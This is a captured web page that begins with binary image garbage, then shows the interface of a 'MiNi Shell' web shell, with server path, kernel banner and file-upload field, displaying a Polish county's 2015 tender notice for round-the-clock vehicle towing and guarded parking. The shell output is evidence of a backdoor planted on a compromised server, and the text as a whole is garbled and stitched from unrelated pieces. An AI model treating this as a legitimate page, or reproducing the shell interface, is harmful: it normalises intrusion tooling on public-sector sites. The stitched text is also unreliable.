JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150403/76370-N-2015.html

<p class="kh_header"><b>Szydłowiec: Całodobowe (przez 7 dni w tygodniu) usuwanie pojazdów z dróg położonych na terenie Powiatu Szydłowieckiego w przypadkach określonych w art. 130a ustawy - Prawo o ruchu drogowym (Dz.U. z 2012 r. Poz. 1137 z późn. zm.) oraz prowadzenie parkingu strzeżonego dla tych pojazdów.</b><br>
<b>Numer ogłoszenia: 76370 - 2015; data zamieszczenia: 03.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Szydłowcu , pl. M. Konopnickiej 7, 26-500 Szydłowiec, woj. mazowieckie, tel. 048 6171008, faks 048 6171061.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.szydlowiecpowiat.akcessnet.net/index.php?idg=1&id=1&x=1</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Całodobowe (przez 7 dni w tygodniu) usuwanie pojazdów z dróg położonych na terenie Powiatu Szydłowieckiego w przypadkach określonych w art. 130a ustawy - Prawo o ruchu drogowym (Dz.U. z 2012 r. Poz. 1137 z późn. zm.) oraz prowadzenie parkingu strzeżonego dla tych pojazdów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1.	Przedmiotem zamówienia jest: całodobowe (przez 7 dni w tygodniu) usuwanie pojazdów z dróg położonych na terenie Powiatu Szydłowieckiego w przypadkach określonych w art. 130a ustawy - Prawo o ruchu drogowym (Dz.U. z 2012 r. Poz. 1137 z późn. zm.) oraz prowadzenie parkingu strzeżonego dla tych pojazdów. Przedmiot zamówienia podzielony został na trzy następujące zadania:
1.1.1.	zadanie I: Usuwanie i przechowywanie rowerów, motorowerów, motocykli i innych pojazdów o dopuszczalnej masie całkowitej do 3,5 t., z wyjątkiem pojazdów przewożących materiały niebezpieczne. 
1. Usunięcie roweru lub motoroweru - 16 sztuk,
-	liczba dób przechowywania - 3 ,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia, ale nie podjęciem czynności związanych z załadunkiem pojazdu -3,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia i podjęcia czynności związanych z załadunkiem pojazdu - 3,
2. Usunięcie motocykla - 10 sztuk,
-	liczba dób przechowywania - 3,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia, ale nie podjęciem czynności związanych z załadunkiem pojazdu - 3,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia i podjęcia czynności związanych z załadunkiem pojazdu - 3,
3. Usunięcie pojazdu o dopuszczalnej masie całkowitej do 3,5 t - 60 sztuk,
-	liczba dób przechowywania - 3,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia, ale nie podjęciem czynności związanych z załadunkiem pojazdu - 14,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia i podjęcia czynności związanych z załadunkiem pojazdu - 14
1.1.2.	zadanie II: Usuwanie i przechowywanie pojazdów o dopuszczalnej masie całkowitej powyżej 3,5 t., z wyjątkiem pojazdów przewożących materiały niebezpieczne 
1.	 Usunięcie pojazdu o dopuszczalnej masie całkowitej powyżej 3,5 t do 7,5 t -6 sztuk,
-	liczba dób przechowywania - 3,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia, ale nie podjęciem czynności związanych z załadunkiem pojazdu - 3,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia i podjęcia czynności związanych z załadunkiem pojazdu - 3,
2.	Usunięcie pojazdu o dopuszczalnej masie całkowitej powyżej 7,5 t do 16 t - 6 sztuk,
-	liczba dób przechowywania - 3,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia, ale nie podjęciem czynności związanych z załadunkiem pojazdu - 3,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia i podjęcia czynności związanych z załadunkiem pojazdu - 3,
3. Usunięcie pojazdu o dopuszczalnej masie powyżej 16 t - 6 sztuk,
-	liczba dób przechowywania - 3,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia, ale nie podjęciem czynności związanych z załadunkiem pojazdu - 3,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia i podjęcia czynności związanych z załadunkiem pojazdu - 3,
1.1.3.	zadanie III: Usuwanie i przechowywanie pojazdów przewożących materiały niebezpieczne- 3 sztuki
- liczba dób przechowywania - 3,
- odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia, ale nie podjęciem czynności związanych z załadunkiem pojazdu - 3,
- odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia i podjęcia czynności związanych z załadunkiem pojazdu - 3,
Rzeczywista ilość zleconych usług uwarunkowana będzie od faktycznych potrzeb w okresie realizacji przedmiotu zamówienia.

1.2.	Zamawiający w niniejszym postępowaniu dopuszcza możliwość składania ofert częściowych; Wykonawca może złożyć ofertę na wszystkie lub wybrane części zamówienia.
1.3  Zakres usługi przewozu, holowania, parkowania pojazdu, we wszystkich zadaniach, w szczególności obejmuje:
1.	dojazd do miejsca zdarzenia w  ciągu max. 90 min. od wydania dyspozycji przez funkcjonariuszy lub pracownika uprawnionego podmiotu wymienionego w art. 130 a ust. 4 ustawy Prawo o ruchu drogowym, w formie pisemnej (w tym w formie faxu) lub ustnej (w tym telefonicznie); dyspozycja złożona ustnie powinna być potwierdzona w formie pisemnej,
2.	przygotowanie pojazdu i jego elementów do załadunku, 
3.	załadunek pojazdu (części pojazdu) na lawetę lub zestaw holujący,
4.	uprzątnięcie miejsca zdarzenia,
5.	holowanie lub przewóz pojazdu na parking pozostający w dyspozycji Oferenta ,
6.	rozładunek i parkowanie pojazdu na parkingu pozostającym w dyspozycji Oferenta,
7.	przechowywanie w zabezpieczonym pomieszczeniu wyposażenia pojazdu, części lub innych elementów zabezpieczonego pojazdu, które zostały oddzielone od pojazdu i mogłyby ulec zniszczeniu lub zaginięciu w miejscu do przechowywania pojazdów,
8.	naliczenie wysokości opłat za usunięcie i przechowywanie pojazdu lub kosztów odstąpienia od usunięcia pojazdu zgodnie ze stawkami określonymi w obowiązującej Uchwale Rady Powiatu Szydłowieckiego w sprawie ustalenia wysokości opłat za usuwanie pojazdów z drogi i ich przechowywania na parkingu strzeżonym oraz wysokości kosztów w przypadku odstąpienia od wykonania dyspozycji usunięcia pojazdu oraz poinformowanie o ich wysokości właściciela lub osobę uprawnioną, zgłaszającą się po odbiór pojazdu,
9.	wydanie pojazdu właścicielowi lub osobie uprawnionej po okazaniu potwierdzenia dokonania opłaty za usunięcie i przechowywanie pojazdu na konto Zamawiającego wg stawek ustanowionych w obowiązującej Uchwale Rady Powiatu Szydłowieckiego w sprawie ustalenia wysokości opłat za usuwanie pojazdów z drogi i ich przechowywania na parkingu strzeżonym oraz wysokości kosztów w przypadku odstąpienia od wykonania dyspozycji usunięcia pojazdu,
10.	umożliwienie osobom upoważnionym dokonywania oględzin zabezpieczonego pojazdu,
11.	w terminie do 5 dnia każdego miesiąca przedstawianie w Starostwie Powiatowym w Szydłowcu (Wydział Komunikacji i Transportu) wykazu pojazdów umieszczonych na parkingu strzeżonym w miesiącu poprzednim, z wyszczególnieniem: trybu usunięcia, daty umieszczenia, właściciela pojazdu (imię, nazwisko, adres zamieszkania), marki pojazdu, numeru rejestracyjnego, numeru VIN oraz daty odbioru przez właściciela oraz kopii dyspozycji usunięcia pojazdu poświadczonej za zgodność z oryginałem,
12.	powiadamianie Zamawiającego oraz podmiotu, który wydał dyspozycję usunięcia pojazdu o  nieodebraniu pojazdu z parkingu w terminie trzech miesięcy od usunięcia, nie później jednak niż trzeciego dnia po upływie tego terminu,
13.	poinformowanie użytkownika usuniętego pojazdu o warunkach jego przechowywania i odbioru (np. poprzez wręczenie ulotki informacyjnej).
1.4. W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązany będzie:
1.	Wykonać każdą dyspozycję usunięcia pojazdu z drogi (całodobowo przez 7 dni w tygodniu),wydaną przez uprawniony organ w trybie art.130a ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (tj., Dz. U. z 2012r., Poz. 1137 z późn.) i umieścić go na prowadzonym parkingu strzeżonym.
2.	Przechowywać na parkingu strzeżonym pojazdy usunięte z dróg na podstawie dyspozycji wydanej przez uprawnione podmioty, o których mowa w § 2 rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 22 czerwca 2011r. w sprawie usuwania pojazdów, których używanie może zagrażać bezpieczeństwu lub porządkowi ruchu drogowego albo utrudniających prowadzenie akcji ratowniczej (Dz. U. z 2011r., Nr 143, poz. 846),
3.	Zapewnić przybycie na miejsce zdarzenia w maksymalnym czasie do 90 min. od chwili powiadomienia Wykonawcy o zdarzeniu,
4.	Usunąć pojazd z drogi i przekazać go na parking strzeżony po otrzymaniu dyspozycji usunięcia pojazdu od uprawnionych podmiotów. Na polecenie podmiotu, który wydał dyspozycję usunięcia pojazdu, w przypadku ustania przyczyny jego usunięcia, Wykonawca odstąpi od usunięcia pojazdu,
5.	Przechowywać pojazdy na parkingu strzeżonym do czasu ich obioru przez właściciela lub osobę do tego upoważnioną.
6.	Świadczyć usługi pojazdami do tego przeznaczonymi
7.	Zabezpieczyć prawidłowe utrzymywanie pojazdów z uszkodzeniami powypadkowymi
8.	Przedstawić w Wydziale Komunikacji i Transportu Starostwa Powiatowego w Szydłowcu, do 5 dnia każdego miesiąca, wykaz pojazdów umieszczonych na parkingu strzeżonym w miesiącu poprzednim, z wyszczególnieniem: trybu usunięcia, daty umieszczenia, właściciela pojazdu (imię, nazwisko, adres zamieszkania), marki pojazdu, numeru rejestracyjnego, numeru VIN oraz daty odbioru przez właściciela oraz kopii dyspozycji usunięcia pojazdu poświadczonej za zgodność z oryginałem,
9.	O nieodebraniu pojazdu z parkingu powiadamiać Wydział Komunikacji i Transportu Starostwa Powiatowego w Szydłowcu oraz podmiot, który wydał dyspozycję usunięcia pojazdu, nie później niż trzeciego dnia, od dnia upływu 3 miesięcy od umieszczenia na parkingu pojazdu usuniętego na podstawie art. 130a ustawy Prawo o ruchu drogowym,
10.	Uporządkować miejsce, na którym znajdował się przeznaczony do usunięcia pojazd, z wyjątkiem konieczności użycia specjalistycznego sprzętu znajdującego się w pojazdach do tego przystosowanych (np. Straży Pożarnej itp.), bez pobierania z tego tytułu dodatkowych opłat.
1.5.	Wymagania dotyczące parkingu:
Zadanie Nr 1
-	parking strzeżony z całodobowym dozorem,
-	oświetlony,
-	ogrodzony - ogrodzenie parkingu trwałe np.: betonowe lub metalowe,
-	nawierzchnia parkingu powinna być utwardzona,
-	swobodny dostęp do pojazdów,
-	parking powinien mieć wydzielone stanowiska postojowe dla pojazdów w ilościach:
a) motorowery-3 szt.
b) motocykle -3 szt.
c) pojazdy do 3,5 tony - 10 szt.
Zadanie Nr 2
-	parking strzeżony z całodobowym dozorem,
-	oświetlony,
-	ogrodzony - ogrodzenie parkingu trwałe np.: betonowe lub metalowe,
-	nawierzchnia parkingu powinna być utwardzona,
-	swobodny dostęp do pojazdów,
-	parking powinien mieć wydzielone stanowiska postojowe dla pojazdów w ilościach:
a) pojazdy do 7,5 tony- 2 szt.
b) pojazdy do 16 ton -2 szt.
c) pojazdy do 40 ton-2 szt.
-	parking powinien posiadać miejsce wydzielone do przetrzymywania pojazdów z wyciekiem oleju oraz innych płynów eksploatacyjnych,
-	zamykany w sposób uniemożliwiający wjazd i wyjazd środka transportu bez zezwolenia osoby dozorującej,
Zadanie Nr 3
-	parking strzeżony z całodobowym dozorem,
-	oświetlony,
-	ogrodzony - ogrodzenie parkingu trwałe np.: betonowe lub metalowe,
-	nawierzchnia parkingu powinna być utwardzona,
-	swobodny dostęp do pojazdów,
-	parking powinien mieć wydzielone dwa stanowiska postojowe dla pojazdów przewożących towary niebezpieczne. Stanowisko postojowe dla pojazdów przewożących towary niebezpieczne powinno spełniać poniższe wymagania:
a)	nie powinno być usytuowane w zagłębieniach terenu, na terenie podmokłym oraz w odległości mniejszej niż 10 m od rowów, studzienek i urządzeń melioracyjnych;
b)	powinno mieć odrębny, szczelny system odwadniania, zaopatrzony w urządzenia do zbierania i neutralizacji wycieków substancji niebezpiecznych.
c)	nawierzchnia stanowiska postojowego dla pojazdów przewożących towary niebezpieczne powinna być utwardzona, nienasiąkliwa oraz zapobiegająca przenikaniu materiałów niebezpiecznych do gruntu, urządzeń wodnych i wód.
d)	ukształtowanie nawierzchni stanowiska postojowego dla pojazdów przewożących towary niebezpieczne powinno uniemożliwiać rozprzestrzenianie się ewentualnego rozlewiska materiałów niebezpiecznych poza terenem stanowiska.
e)	do stanowiska postojowego dla pojazdów przewożących towary niebezpieczne powinien być zapewniony dojazd o parametrach technicznych określonych w odrębnych przepisach dotyczących warunków, jakim powinny odpowiadać drogi pożarowe.
f)	parking powinien być usytuowany w odległości nie mniejszej niż:
-	30 m od stanowisk postojowych dla innych pojazdów, urządzeń inżynieryjnych niezwiązanych z parkingiem oraz budynków, z wyłączeniem obiektów, o których mowa w pkt. 3
-	40 m. od lasu o powierzchni powyżej 3ha, gazociągów wysokiego ciśnienia i torów kolejowych;
-	300 m od budynków mieszkalnych i innych przeznaczonych na pobyt ludzi ,ujęć wody, studni publicznych, urządzeń służących do magazynowania i uzdatniania wody.
-	zamykany w sposób uniemożliwiający wjazd i wyjazd środka transportu bez zezwolenia osoby dozorującej,
-	dysponowaniu, w okresie realizacji zamówienia pojazdem specjalnym typu laweta do transportu pojazdów przewożących materiały niebezpieczne.
g)	parking, powinien być wyposażony w:
1)	odpowiednie znaki drogowe oraz znaki informacyjno-ostrzegawcze;
2)	sprzęt przeciwpożarowy, w szczególności:
-	gaśnicę przewoźną 25 kg proszkową lub CO2,
-	dwie gaśnice proszkowe 6 kg,
-	2 koce gaśnicze,
-	skrzynię zawierającą co najmniej 1 m3 piasku,
-	substancje i materiały neutralizujące i pochłaniające;
3)	dostęp do bieżącej wody.
Uwagi ogólne:
a)	doba rozpoczyna się z chwilą umieszczenia pojazdu na parkingu,
b)	pojazd będzie przechowywany na parkingu strzeżonym do czasu jego odbioru przez właściciela lub osobę przez niego upoważnioną,
c)	wydanie pojazdu usuniętego w trybie art 130a nastąpi po okazaniu dowodu uiszczenia opłat za jego usunięcie i przechowywanie lub gdy jest to wymagane, zezwolenia wydanego przez podmiot, który wydał dyspozycję usunięcia pojazdu,
d)	pojazd usunięty w trybie określonym w art. 130a ustawy i nieodebrany przez właściciela lub osobę uprawnioną w terminie 3 miesięcy od dnia usunięcia pozostaje na parkingu do czasu zakończenia postępowania sądowego w sprawie przepadku pojazdu na rzecz powiatu,
e)	wykonawca będzie naliczał wysokość opłat za usunięcie pojazdu i jego przechowywanie w wysokości określanej w ofercie i w umowie..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony w przypadku posiadania przez Wykonawcę aktualnej licencji na wykonywanie transportu drogowego rzeczy - zgodnie z art. 5 ust. 1 ustawy z dnia 6 września 2001r. o transporcie drogowym (t.j. Dz. U. z 2012r. Poz. 1265 z późn. zm.) oraz złożenia wraz z ofertą podpisanego załącznika nr1 do formularza oferty - oświadczenie o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie
wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna, że warunek jest spełniony, jeżeli wykonawca złoży wraz z ofertą podpisany załącznik nr 1 do formularza oferty - oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony w przypadku wykazania przez wykonawcę dysponowania:
Zadanie Nr 1
-	ca najmniej jednym pojazdem specjalnym typu laweta do przewozu pojazdów do 3.5 tony wyposażonym we wciągarkę,
-	złożenia wraz z ofertą podpisanego załącznika nr1 do formularza oferty - oświadczenie o spełnianiu warunków udziału w postępowaniu
Zadanie Nr 2
-	co najmniej jednym pojazdem specjalnym typu laweta do przewozu pojazdów powyżej 3.5 tony. wyposażonym we wciągarkę
-	złożenia wraz z ofertą podpisanego załącznika nr1 do formularza oferty - oświadczenie o spełnianiu warunków udziału w postępowaniu
Zadanie Nr 3
-	co najmniej jednym pojazdem specjalnym do przewozu pojazdu przewożącego towary niebezpieczne.
-	złożenia wraz z ofertą podpisanego załącznika nr1 do formularza oferty - oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna, że warunek jest spełniony, jeżeli wykonawca złoży wraz z ofertą podpisany załącznik nr 1 do formularza oferty - oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie tego warunku jeżeli Wykonawca wykaże posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości co najmniej 500 000,00 złotych (słownie: pięćset tysięcy złotych).
Wykonawca na podstawie art. 26 ust 2b ustawy Pzp może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
